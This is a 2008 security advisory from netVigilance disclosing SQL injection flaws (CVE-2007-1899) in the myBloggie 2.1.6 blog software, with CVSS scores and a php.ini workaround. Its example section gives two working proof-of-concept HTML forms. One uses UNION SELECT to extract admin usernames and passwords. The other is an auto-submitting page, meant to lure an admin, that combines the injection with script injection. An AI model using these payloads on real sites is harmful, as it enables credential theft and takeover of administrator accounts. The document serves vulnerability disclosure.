mybloggie-sql.txt

`netVigilance Security Advisory #40  
  
myBloggie version 2.1.6 Multiple SQL Injection Vulnerability  
Description:  
myBloggie (http://mywebland.com/mybloggie/) is considered one of the   
most simple, user-friendliest yet packed with features Weblog system   
available to date. Built using PHP & mySQL, web most popular scripting   
language & database system enable myBloggie to be installed in any   
webservers.  
A security problem in the product allows attackers to commit SQL injection.  
External References:  
Mitre CVE: CVE-2007-1899   
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899  
NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899  
OSVDB:  
  
Summary:  
myBloggie is weblog system built using PHP & mySQL, the webs most   
popular scripting language & database system which enable myBloggie to   
be installed in any webserver.  
  
Successful exploitation requires PHP magic_quotes_gpc set to Off and   
register_globals set to “On”.  
Advisory URL:  
http://www.netvigilance.com/advisory0040  
  
Release Date: June 30th 2008  
  
Severity/Risk: Medium  
  
CVSS 2.0 Metrics  
Access Vector: Network  
Access Complexity: High  
Authentication: Not-required  
Confidentiality Impact: Partial  
Integrity Impact: Partial  
Availability Impact: Partial  
CVSS 2.0 Base Score: 5.1  
  
Target Distribution on Internet: Low  
  
Exploitability: Functional Exploit  
Remediation Level: Workaround  
Report Confidence: Uncorroborated  
  
Vulnerability Impact: Attack  
Host Impact: SQL Injection.  
  
SecureScout Testcase ID: TC 17969  
  
Vulnerable Systems:  
myBloggie version 2.1.6  
  
Vulnerability Type:  
SQL injection allows malicious people to execute their own SQL scripts.   
This could be exploited to obtain sensitive data, modify database   
contents or acquire administrator’s privileges.  
  
Vendor:  
myWebland (http://mywebland.com/)  
  
Vendor Status:  
The Vendor has been notified April 9th 2007, but did not respond.  
Workaround:  
In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off  
  
Example:  
  
SQL Injection Vulnerability 1:  
Create html file with the next content:  
<html>  
<body>  
<form   
action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser"   
method="POST">  
<input type="submit" name="user_id" value="1 #' UNION SELECT   
CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1   
FROM `mb_user` /*">  
</form>  
</body>  
</html>  
  
REQUEST:  
Browse this file and click on the button  
REPLY:  
<tr><td colspan="3" class="spacer6"></td></tr>  
<tr><td></td><td></td><td align="right">  
<span class="f10pxgrey">Category : <a class="std"   
href="?mode=viewcat&cat_id=1">  
[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN   
PASSWORD]</a>  
Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif"   
alt="" />  
<a class="std" href="?mode=viewid&post_id=1">Comments</a>[1] |  
<img src="./templates/aura/images/trackback.gif" />  
  
SQL Injection Vulnerability 2:  
  
(SQL Injection + XSS Attack Vulnerability)  
Create html file with the next content and place it for example on   
http://somedomain.com/file.html:  
<html>  
<body onLoad="document.forms(0).submit();">  
<form action="   
http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit"   
method="POST"> <input type="hidden" name="post_id" value="-1' UNION   
SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`),   
'</textarea><script>alert(document.post.subject.value)</script>', 5,6,7   
FROM `mb_user`#">  
</form>  
</body>  
</html>  
REQUEST:  
Induce a Mybloggie admin to browse the malicious page.  
http:// somedomain.com/file.html  
  
REPLY:  
Page containing username and password for Mybloggie admin account.  
  
  
Credits:  
Jesper Jurcenoks  
Co-founder netVigilance, Inc  
www.netvigilance.com  
`